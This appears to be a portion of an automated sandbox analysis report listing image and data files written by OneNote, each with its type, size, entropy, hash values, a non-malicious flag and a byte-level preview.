                                                                                                                                                                                                              SHA-512:ED0767364897FCCEE678BBE1E52E4803ABF00E30505084E00BFBC5DE40B46793771C50CAD23D9B4375F491E3B1765D067D4B1DC05FABABEA21982278E59BA281
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......h...v...\...................................................................................................................................2...>...D.......v................................I.......I.qk..B.....LZh.......h....$.3r....-h....$.3r....-h....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.................A$....0..XI.....N...^....................in@......h.........f........................................I.qk..B.....LZ................A$....0..XI.............A$....0..XI..........h.......h.......h...........................................h..j....h..T.]..h.......h...B..h..H....h....B..h....>.)h....J...................;........4...4...4.."..............h...h...h....z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4.........h.......h......#h..............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):79656
                                                                                                                                                                                                              Entropy (8bit):7.966459570826366
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:2kuUliOeU4os8ii3nF3Hxro/qxXD9u/kjYgMZqoEs6ZUldm:3uUsOXYIAixR2k7WAZV
                                                                                                                                                                                                              MD5:39FF3ACAE544EAC172B1269F825B9E9F
                                                                                                                                                                                                              SHA1:2D40DE8D90BD21D56314D3F99CEF4FBAE3712C0F
                                                                                                                                                                                                              SHA-256:70475431CCA3C91A4EFA3B8F04864371D2D3A45696674A1A0562FE9CD8DB287C
                                                                                                                                                                                                              SHA-512:3B9F3B32696AB7779864E83DC0C45960114A130BEE0CF4D0643DE57FF952171E5D775AA49141EE31A28A9B5D052B26EB421F26EA736D7EF4B3A7EC812CA411CB
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!.1A.Qa"..q.....2#..BRb..r3$.Cc..Ss.4...D%5&..T...'7....................!1.A..Q.aq..."2.....B3.r.#..R...bc$4..D.s%............?..Y..T.o.\......=.a..j..'^..s..[../........Y.......<...(..4.....7y..Ln.[9.cK.ilN...u@$.V.9.V?3..s.KL.z..w.jW.C.............@.~+.o?o8...k....,.m..9.".....q.....d....z.W...q...~...'..e..>..f#...S.....F....pU.......7..N.vfK......S..G.#.....}.c.........RXt.bq1.`.....[+8\.*.N..:......}.....r..........')......Na...&...m......c...a4_%d.............co..0.n.L.Q..E.Lt..y.|..F..4.i(>.._..\.eNL8..?z9I:hLgC.@.p....g.t......'.I!d..?1f..R..........|..4.wJ*..%g..~0bt.....*...v.......O...:.~.>~..o.x...9.@>...s.&.E.0/G.c..t.<..F.t.A.z. ......;.........Gp.P
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.457972523003907
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:oHsN5WH8l+oe3E0cpX4mcp9q83DwRy25elR/:0saH8lT9rpXip933DwRyOen
                                                                                                                                                                                                              MD5:11C43BE6AC1174DC121C40CC64000DC4
                                                                                                                                                                                                              SHA1:0F1ACDE9803A07C1A6C2CC0225E365C205E375D8
                                                                                                                                                                                                              SHA-256:B11A9AED3E8EF1E83FF70A61C731BFD0511E932C1AC6053E91D40F7F4CE34FB2
                                                                                                                                                                                                              SHA-512:C876BB1CF475DDF74EDAFA54161CE5A09329777509BA0674725008DA3243BDC926B2590D74F2641B47CB5C7E0CADCAB30B3533950A87379E97C3952C72083F52
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......p...v...d.....................................................?....?........................................................................2...>...L.......v................................I.......I.qk..B.....LZm.J.....m.J(....5.......m.J(....5.......m.J..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............#9^..0.._[$q.....N...^...................vUGJ.....X..........f................................... ....I.qk..B.....LZ..............#9^..0.._[$q...........#9^..0.._[$q..........m.J.....m.J.....m.J.........................................m.Jj....m.JT.]..m.J.....m.J..B..m.JH....m.J..B..m.J..>.)m.J..J...................;........4...4...4.."..............m.J.m.J.m.J..z...y.. x.. ...........$........4...*..7*..7........................;........4...4...4.........m.J.....m.J....#m.J............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):40884
                                                                                                                                                                                                              Entropy (8bit):7.545929039957292
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:MCBOA4d+ElOXJ/3pI7cRBiL7L6qERqGz65WXzZqJsKQSbIsTT6XB:hIAU+2cGdLX6qBG4WDZl4Ihx
                                                                                                                                                                                                              MD5:7379775A1E2AB7FAB95CFFCE01AE05F3
                                                                                                                                                                                                              SHA1:3D3DDFD8AC7E07203561BAE423D66F0806833AB3
                                                                                                                                                                                                              SHA-256:9301DB6D2D87282FCEE450189AEACE16D85F64273BF62713A3044992B6B7A9E9
                                                                                                                                                                                                              SHA-512:4B5006E620E80D3A146944649CF4CA619782CAD7E8C4CD0D1DE0EBCA0FA05EACB7378DAFCEED3E26F5698B07F19604614D906C8F51F898660E2F129D8DEC6F62
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!.1A.....Qaq....".....2....BR#S..br...3T...C$.7(Hx....4D.G..Xh.cs..'..t...%...8.....................1...!AQ..a...q"2.4Tt.......R3S....Br...#s...Uu.bc.de..$D..6..C%E..............?...z...;sB.yv...........]t.\...n...../....m....M.=.3G+..x+.....S).*&.J../..8..O/+..sG...p...<!....~.c..C.w..,[oHom.wc-.J.~.......L[..6...'..i_..S;...!Y.z.q].EK..M.x...i.x.+.;.+...}....#......f.)........e6V..p.;........s.)..Ml.J......IU.6...<9+9.^..l..Y...[._...2..^..j.ia...._..3.;...~..<3...;......z.^.......]..Qk.,...Yk...3.3Jy^p.}....q...I...&..t.......;..9.g.GH;..'...%...)..[..y..../...zCn..>...'...1e.Y..;....]..7...N>t..m-.j.............H^..T\.q.ru...}...eTn]I'r.^].#..wOY....v
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.355178873072197
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:Yu2syMOhBMVM59fxXOSQt+5EfsW+bX89Liodrdqr6eu1RXJpIMVMb5IqMkMuMhx:YRsO9d5QcEkW+bX89LicRyu1i4
                                                                                                                                                                                                              MD5:4DF1A01F16292B52B96583B3BB56F301
                                                                                                                                                                                                              SHA1:8F2F499FB7DF57F5F21877FA495E1975AF2505F9
                                                                                                                                                                                                              SHA-256:014644639D965213C6A49C1166BFA8B06F40DD4A7BDA1EAE12B6C85E4AC347B0
                                                                                                                                                                                                              SHA-512:A06B77957FE6C780288D970C90325AEFC9B6BC03D2E815455B536642F3FB04887A1ED2769CA155529982B4AAC6303D969CFFAAF603A50DC4E75DCAFC2048EB14
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......P...v...D...................................................?....?..........................................................................2...>...,.......v...x............................I.......I.qk..B.....LZf.".....f."B.Ny.!...6.k.f."B.Ny.!...6.k.f."..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............._#Q~...._...O&.....N...^...............F.6T..vM..).rh.%........f........................................I.qk..B.....LZ............._#Q~...._...O&.........._#Q~...._...O&..........f.".....f.".....f.".........................................f."j....f."T.]..f.".....f."..B..f."H....f."..B..f."..>.)f."..J...................;........4...4...4.."..............f.".f.".f."..z...y.. x.. ...........$........4...*..7*..7........................;........4...4...4.........f.".....f."....#f."............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:05:55], progressive, precision 8, 612x618, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):68633
                                                                                                                                                                                                              Entropy (8bit):7.709776384921022
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:tapXpSTJDOkFGdJdBk/slsbfsw1imaapnbvD8:U2OjJr6b07m1bvD8
                                                                                                                                                                                                              MD5:41241EE59AB7BC9EB34784E3BCE31CB4
                                                                                                                                                                                                              SHA1:98680761A51E9199CF3C89F68B5309FBEC7EE3CB
                                                                                                                                                                                                              SHA-256:035B26DF61855A3F36DBD30FDAB0C157C04C9E8AE2197EA4D4AEB3E82E6A4C2B
                                                                                                                                                                                                              SHA-512:3EE331D5BCEE4AD5D3FC9661D4AB4053F7D351591A094334F963C33C9D0E32CCCABE9334AD7C308108CE99617E064FE848DCD469ACD8D83FBE5C4452DE523D8F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:05:55.............................d...........j...........................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?../$.W:SZ./...9.....-...u......r.....].c...@W_.7...+......v.+PD.I..-<1.pDn-\.....p.$....0.}V....\..>.~..XN.o..l(E....ik..o.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.39035541454536
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:5iskVDaT5ttSbEg3LaZJvevfxX09TEoflrdqr2zRX/GYuSUl:5iszTX+Eg3kmXxX09TEcRyIRxU
                                                                                                                                                                                                              MD5:62DB70DBC50E30534D54AD4461B44534
                                                                                                                                                                                                              SHA1:075BC9114CA66C3374262A1752847E2A6AB6DE19
                                                                                                                                                                                                              SHA-256:F4513037FD6BF9B3EC5990CE799898F1327B8DD8A467522CE9E843F72E25874C
                                                                                                                                                                                                              SHA-512:8D4106B3EF0412DD526472F3E507C09B7A4FFA377AD6D78A57BE1F70E3E7E06E1DAA8B10A5EED2B0F892803757A697681BAA6D0C73D36DE0D86F4BF43D15ACC6
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......t...v...h...................................................................................................................................2...>...P.......v................................I.......I.qk..B.....LZ.............q...7..... .....q...7..... .....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............b....?=...#......N...^...............?....3C...s3..+........f...................................$....I.qk..B.....LZ..............b....?=...#............b....?=...#..........................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4...*..7*..7........................;........4...4...4........................#...............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:PNG image data, 176 x 513, 8-bit colormap, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):11043
                                                                                                                                                                                                              Entropy (8bit):7.96811228801767
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:YyroOCsBI9pkCFsHHX2RE6VOlPuIqmBtJNBfAr+ADP1IATaNeTyZ4GF+WQQ6Qwq2:BUOCsB2kCGH32RiPDtDBfArPDP1I/eyM
                                                                                                                                                                                                              MD5:8E9AB9C28B155A66BC5C0DA5E2A4EFB5
                                                                                                                                                                                                              SHA1:972E61F162D48F1CEE21963ECBB2FE439105DB55
                                                                                                                                                                                                              SHA-256:B243A24FA13BC8523450E22F408F9EFF15301C938F8CA52A57018B58CE6785DE
                                                                                                                                                                                                              SHA-512:12062D69E676B3B34AFCEF25AC17B40294282D5BAB6C0110680293D7CC96EC17EBCFE104C284E64A30EE3C483E319E9C37C03F6EE82C79632180E45C7A684E8C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.PNG........IHDR..............`....`PLTE............................................................................................... .......bKGD....H....cmPPJCmp0712....H.s...*YIDATx^.]...,.N.8.i......0..e..y.......8.6....Fo.........=...F..._..........O..{..............3.|.L.|.............>.....v..n.1J...k...."....7........J._.5LQ`..k...._Z.W.x:..k...g..._.....u<.Q{...1...q6.cs...l............30.g...< W...a.5..>O....9}..c..........s|I.).>.fo4.<q......>...c.:.u..co.#.7,.O..G./.K.|..q.p...(.(....iH.......m..+.7...../..{W.l....b....?.`^.q.9L&.>.hN2`1..m...]$.0J....rBy......{.._...G....;.r.Q..;..,...9..F...t;.+..2.Ub......V...8.k..5.........'[..s.H..).......%j._.&.....BN..V..q...T...#..........0.E&.o7....$..m..8g.f._$..k.8...5......HgQ...L..\.........)B.I.r.(..8.a..$N.9.=..o..Q..(.e.a..O.....c.= .......$0..X.S,..(p......$..l.c.I...=."......g....^..#~,&.a9iK..ZNE`...pFJ.@Wd?.<..Bt.E.......e...i.%d...}.!..B......9.........B}.....5...;..hL.D.....4z.....|.)
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.348104297302522
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:YW2sudGBbR3ot5p6GKEQLQX5S9PDSoJrdqrDXo+ORX549rRNl:0srbxowEQMX5S9PDSARyLo+Oq
                                                                                                                                                                                                              MD5:3EBDCF35097F3D18D851AB2EBFE675E9
                                                                                                                                                                                                              SHA1:6F0ADF0E48FD994A18ECA17266CDD1C30020F32A
                                                                                                                                                                                                              SHA-256:75494BAFC27155CD4B7710A917C68A04A6FB96A84524E1FB0F6264E38ED45571
                                                                                                                                                                                                              SHA-512:1F9F53754A8B868CEC886E5E86D774F91E7169F15C38659276FC3CBB11A3A8986CA0F497CF29D4A122AA5539147E6B1B1A3D7EC5FE631C57D8667B331C83BB6D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZr8i.....r8iG....<...>...r8iG....<...>...r8i..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'................l7....i..J......N...^.................3..QDH....v.M.........f........................................I.qk..B.....LZ...............l7....i..J.............l7....i..J...........r8i.....r8i.....r8i.........................................r8ij....r8iT.]..r8i.....r8i..B..r8iH....r8i..B..r8i..>.)r8i..J...................;........4...4...4.."..............r8i.r8i.r8i..z...y.. x.. ...........$........4...*..7*..7........................;........4...4...4.........r8i.....r8i....#r8i............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:PNG image data, 40 x 650, 8-bit colormap, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):647
                                                                                                                                                                                                              Entropy (8bit):6.854433034679255
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:6v/71rwqZMXVs99W1YvpLp/Fvl+f43ocLtuplb+CrGotLRd:+wqWXVs99rpLpNvr3pIx3b
                                                                                                                                                                                                              MD5:DD876AA103BEC3AC83C769D768AD39FB
                                                                                                                                                                                                              SHA1:1833603AA9B6A7E53F9AD8A336F96CCE33088234
                                                                                                                                                                                                              SHA-256:1262DD23AD54E935CFA10FEB1BE56648E43BEF1116696CA71D87E6E033B1CA7D
                                                                                                                                                                                                              SHA-512:946DB2277213104A3B29EC4388578B05027B974A3093B4CCAD8847397AA51AE308BC6A199E5705E1F901D6E4B1BA34D8DECFD6E5B6685184A307D749D7CFAEDD
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.PNG........IHDR...(.........xk....`PLTE.........................................................................................>.S.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.)..1..7w....6.*.H`T6.ha.k.............b!....Ba..C..P.4K..@.....h.E..X....PX+.P.-.....@@"...o.O4....xZ<...B...B..,A..y.s<......b!....Ba..C..0_p. .......=..,...i. ...=.j..N...........{4+...xZ<...B....|.....$.K<.vyE..X....PX+.P.-.:... .'p......\,...i. ...=.j........K.....%J..S+.....q..k.H.@DD.s...:..J.K.DDL.\.@`,.DD.:.(]..N....KD....A M.....F..S+.....1.sq........\.t..;..../...~k...4.DD.:..]..N....KD........@DD.s...:..J.K..[...Q....V......IEND.B`.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.356392330897396
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:nJgs//wJiqu69AxaEjFFXp9/v+ARyKjcBOI:OsAJdxqxFXp9/2ARyKjc
                                                                                                                                                                                                              MD5:13F89BD6AED3A2A4FEABB6A72E707012
                                                                                                                                                                                                              SHA1:6BCE90925C03FF85C697375ECE6F517CD2F7CBA1
                                                                                                                                                                                                              SHA-256:36240551E810012959220FE71559845ACD433555477345640CE5929C4B1AB1C4
                                                                                                                                                                                                              SHA-512:C9343C940C8D487428D45360E09F889CCF1ACCDB5251DF7A09C7BAD1AC70A899E1424D70F63C6CC4D57EDAB7A0FE603546300EE0F5ECCEAC805694BE620B1597
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......T...v...H...................................................................................................................................2...>...0.......v...|............................I.......I.qk..B.....LZ% ~.....% ~...p.2.>...a.% ~...p.2.>...a.% ~..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'................7.{.-.jq<." ....N...^................x.$...D...............f........................................I.qk..B.....LZ...............7.{.-.jq<." ...........7.{.-.jq<." .........% ~.....% ~.....% ~.........................................% ~j....% ~T.]..% ~.....% ~..B..% ~H....% ~..B..% ~..>.)% ~..J...................;........4...4...4.."..............% ~.% ~.% ~..z...y.. x.. ...........$........4...*..7*..7........................;........4...4...4.........% ~.....% ~....#% ~............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:27:10], progressive, precision 8, 102x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):52912
                                                                                                                                                                                                              Entropy (8bit):7.679147474806877
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:DB/nIviNJD9C8kfJj6TkVr4q24FsUpjPc021si:DdnIvi3D9C8Cl6Dq24ayPCz
                                                                                                                                                                                                              MD5:1122BF4C2A42B4FA7F29D3C94954A7C9
                                                                                                                                                                                                              SHA1:3750077A830FE21735A43ABD35C63BA9A4D4B0DE
                                                                                                                                                                                                              SHA-256:423B0DD1A93B391D15B1DC8D8757C3BF5725FF2E7A59E6E3140033E2876B67F6
                                                                                                                                                                                                              SHA-512:4626EFE2EDED2361D6296B57F994DC434CC9D02357A8A6A67D84A544FB8A1CFE0005EA98F846AB963BED7F2B6CE96BC9181182C9459843A52A98D3A731A4FE73
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:27:10............................f.........................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....]+\.9.9.P.d..Z.?~>.-...]6=....*.......S.9G...b<$..Z..........>.v.o:.o%.e...z.F`...[.wo..z.....k..E...5....G..7.......c2..
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.289821279144936
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:M3sPxd42LFptnWRO9EkYTVXaC9vD6o5rdqrLMRXtDtTplv1:M3sNBp4aEkwXz9vD6wRygPh
                                                                                                                                                                                                              MD5:291C6C40217208CCD5C678C403ADD2E4
                                                                                                                                                                                                              SHA1:EE8FE493E96CA6ABBB41EC34344777E7A3700A15
                                                                                                                                                                                                              SHA-256:DA463C2902D14BE9882D085D49AA07CE974002FE84C0750140E7A1D621AECDA3
                                                                                                                                                                                                              SHA-512:FEF5B1460E9CE10D6FDD1DD095BDA63F7DE26AB0DBDF8124E738E41344F479E842031902D189413252DCF77033EFD365BCE7CCC73E96A5C29932C9EBB98DB9AC
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......N...v...B...................................................................................................................................2...>...*.......v...v............................I.......I.qk..B.....LZ...........W'v.....1Q.O...W'v.....1Q.O.....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'............._.t......E.......N...^................;.h6a.N....K4.l........f........................................I.qk..B.....LZ............_.t......E..........._.t......E...........................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4...*..7*..7........................;........4...4...4........................#...............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:18:09], progressive, precision 8, 164x641, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):27862
                                                                                                                                                                                                              Entropy (8bit):7.238903610770013
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:LTawAZvhbrXzDc6LERLQ/b5vXOl6pXQ/wD5OUMrdRUUhCplQg0ESSz:6wm/vT/b4wxoqbdUhWnSs
                                                                                                                                                                                                              MD5:E62F2908FA5F7189ED8EEBD413928DEE
                                                                                                                                                                                                              SHA1:CA249B4A70924B73BDA52972E9C735AEC35A0C5D
                                                                                                                                                                                                              SHA-256:20ABE389C885E42B6EBE9E902976229BB6FD63C8C34CB61AA70B8B746209F90A
                                                                                                                                                                                                              SHA-512:EE8D1821A918BE8714F431895E7223D08036E88A4FDB9A5485EFF246640EE969A69A8AA4E2E9DDC35BA75FB6D4E95092A286E90B477BD6998C313639C2C31F25
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:18:09......................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................!.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..P.v..+..n(a..Q..S\6....Y....D......} w#.b..]l.5.RU..k...... ]$.$.........f........?.z@2uU...7....?..|.Q..I.&.. ......"T4)wdH.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.472899767434324
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:jSs9yY0IK9UDSMt1jE5zqmlsXoqZ9TP96ohrdqrLnLRXzqNJB39:estBK9UDXDE5PCX39TF6ARy38N
                                                                                                                                                                                                              MD5:6C01D9321DEB932F6364D6F9E16D5724
                                                                                                                                                                                                              SHA1:3DB30AC8B1121E30ECC0D6DAE33E3918F074E2B6
                                                                                                                                                                                                              SHA-256:17B9D0BC83F9F1A86A46F55981792711A9C8FD5DD900B0616502F1960F48AC3B
                                                                                                                                                                                                              SHA-512:AAFFC21132A6B0B36668D1502AFADA8D83B040340812D41B908B2770C50636B212F65C938BE9A947A35E8CD7ACAB299F6AD6FD86E95BDDB46BEF2C64062901F5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......r...v...f...................................................................................................................................2...>...N.......v...............................G.......G..Av^..0...9...I.......I.qk..B.....LZG..Av^..0...9..G....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............~H...n.....kI.P.....N...^................hg.Q.%M..K..=..........f..................................."....I.qk..B.....LZ............~H...n.....kI.P.........~H...n.....kI.P..........G.......G.......G...........................................G..j....G..T.]..G.......G....B..G..H....G....B..G....>.)G....J...................;........4...4...4.."..............G...G...G....z...y.. x.. ...........$........4...*..7*..7........................;........4...4...4.........G.......G......#G..............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:PNG image data, 50 x 556, 8-bit colormap, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):977
                                                                                                                                                                                                              Entropy (8bit):7.231269197132181
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:6v/7QiFJaY/z+obuqFA4fypjQSbtBK+lcqNGSbb7XTJArRRzN5DjNRkPmu5cCbR2:x0QY7xbjy9pY0JPXLTWroeuCCbX0
                                                                                                                                                                                                              MD5:B7F74C18002A81A578A4EE60C407A8D3
                                                                                                                                                                                                              SHA1:70A7D4BB1B3ADF4397D168AD0D81B286F88EBDE0
                                                                                                                                                                                                              SHA-256:95F59A0433050180D4C0E8858B83363D51BEA6752A8B7CA516A8677854D8F5B6
                                                                                                                                                                                                              SHA-512:13186A7CDCE80BCA9D2238666D6D7A989FA1887EABFA5D8A9A63EEC304DFD4BE8EFF652205FA56E1D1CEE7D3680AF8C70A952AF73AB3C246400E8D4EBECBDBA9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.PNG........IHDR...2...,........A....PLTE...................................................................................................................................................................................$.y.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^...0.D_.......cck.....%a...X.a0Y...-..!.G...[....(.r.H.$...1 .zq.4V.e|a.6.X..4..kl.%....=w....6..TN.....{.4..T/.z...../.....3..!~..t.#b..^.....E!.SFb ...-.....^...,..C.!.b...i._c...s.X.w.. lsQH..H.gKc@@...i. ....m...;Ci....@G.; V{..lO..\.R9e$..{.....P...E.+.2.0D.B,..P...56.?......K.6..TN....^z.4..T/.z...../.....3..!~..t.]b........E!.SFb ...-.....^...,..C.!.b...i._c..Y.O...?.9k2.M.?5 .n.P...,...d._..%M?....6....,.1..R.4.a.R.+..U.Q..P...vd..T........j .]@....."..lJ../.90.4...Y. ...9.%...{......Hc%.....i..%M?aG..H....o.q.......4.......X.d9.r..CI.O.5.Ri0?.s\b....w...>/k..4V.)Y....P...vd..T........j .]@....."..lJ../.90..2..MP..l..?....K.X.....IEND.B`.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.236313988258647
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:ssS+lhwsnWSE3TKXonB9zP8RycOlKVCkJ:ssS+l2sW/jKXQB9zP8RycOlKVCk
                                                                                                                                                                                                              MD5:0930FA4473B4235FA3933A7A66CE0E9C
                                                                                                                                                                                                              SHA1:4344DE07E78FB5F3DF75C5A7221CD4798BD34D84
